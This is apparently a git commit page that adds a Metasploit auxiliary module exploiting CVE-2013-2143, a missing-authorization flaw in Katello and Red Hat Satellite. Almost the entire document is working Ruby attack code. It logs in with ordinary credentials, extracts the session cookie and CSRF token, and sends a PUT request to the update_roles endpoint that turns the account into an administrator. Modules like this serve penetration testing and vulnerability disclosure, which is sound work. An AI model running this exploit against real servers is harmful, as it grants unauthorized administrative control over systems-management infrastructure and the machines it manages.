Add katello_satellite_priv_esc.rb
This module exploits a missing authorization vulnerability in the "update_roles" action of "users" controller of Katello and Red Hat Satellite (Katello 1.5.0-14 and earlier) by changing the specified account to an administrator account.bug/bundler_fix
parent
0c3a535434
commit
473f745c3c
|
@ -0,0 +1,149 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',
|
||||
'Description' => %q{
|
||||
This module exploits a missing authorization vulnerability in the
|
||||
"update_roles" action of "users" controller of Katello and Red Hat Satellite
|
||||
(Katello 1.5.0-14 and earlier) by changing the specified account to an
|
||||
administrator account.
|
||||
},
|
||||
'Author' => 'Ramon de C Valle',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2013-2143'],
|
||||
['CWE', '862'],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 24 2014'
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('USERNAME', [true, 'Your username']),
|
||||
OptString.new('PASSWORD', [true, 'Your password']),
|
||||
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Logging into #{target_url}...")
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),
|
||||
'vars_get' => {
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
},
|
||||
)
|
||||
|
||||
if res.nil?
|
||||
print_error('No response from remote host')
|
||||
return
|
||||
end
|
||||
|
||||
if res.headers['Location'] =~ /user_session\/new$/
|
||||
print_error('Authentication failed')
|
||||
return
|
||||
else
|
||||
session = $1 if res.headers['Set-Cookie'] =~ /_katello_session=(\S*);/
|
||||
|
||||
if session.nil?
|
||||
print_error('Failed to retrieve the current session')
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
print_status('Retrieving the CSRF token for this session...')
|
||||
res = send_request_cgi(
|
||||
'cookie' => "_katello_session=#{session}",
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'dashboard')
|
||||
)
|
||||
|
||||
if res.nil?
|
||||
print_error('No response from remote host')
|
||||
return
|
||||
end
|
||||
|
||||
if res.headers['Location'] =~ /user_session\/new$/
|
||||
print_error('Authentication failed')
|
||||
return
|
||||
else
|
||||
session = $1 if res.headers['Set-Cookie'] =~ /_katello_session=(\S*);/
|
||||
|
||||
if session.nil?
|
||||
print_error('Failed to retrieve the current session')
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
if res.headers['Location'] =~ /user_session\/new$/
|
||||
print_error('Failed to retrieve the user id')
|
||||
return
|
||||
else
|
||||
csrf_token = $1 if res.body =~ /<meta[ ]+content="(\S*)"[ ]+name="csrf-token"[ ]*\/?>/i
|
||||
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(\S*)"[ ]*\/?>/i if csrf_token.nil?
|
||||
|
||||
if csrf_token.nil?
|
||||
print_error('Failed to retrieve the CSRF token')
|
||||
return
|
||||
end
|
||||
|
||||
user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/
|
||||
|
||||
if user.nil?
|
||||
print_error('Failed to retrieve the user id')
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")
|
||||
res = send_request_cgi(
|
||||
'cookie' => "_katello_session=#{session}",
|
||||
'headers' => {
|
||||
'X-CSRF-Token' => csrf_token
|
||||
},
|
||||
'method' => 'PUT',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),
|
||||
'vars_post' => {
|
||||
'user[role_ids][]' => '1',
|
||||
}
|
||||
)
|
||||
|
||||
if res.nil?
|
||||
print_error('No response from remote host')
|
||||
return
|
||||
end
|
||||
|
||||
if res.headers['X-Message-Type'] =~ /success$/
|
||||
print_good('User updated successfully')
|
||||
else
|
||||
print_error('Failed to update user')
|
||||
end
|
||||
end
|
||||
|
||||
def target_url(*args)
|
||||
(ssl ? 'https' : 'http') +
|
||||
if rport.to_i == 80 || rport.to_i == 443
|
||||
"://#{vhost}"
|
||||
else
|
||||
"://#{vhost}:#{rport}"
|
||||
end + normalize_uri(target_uri.path, *args)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue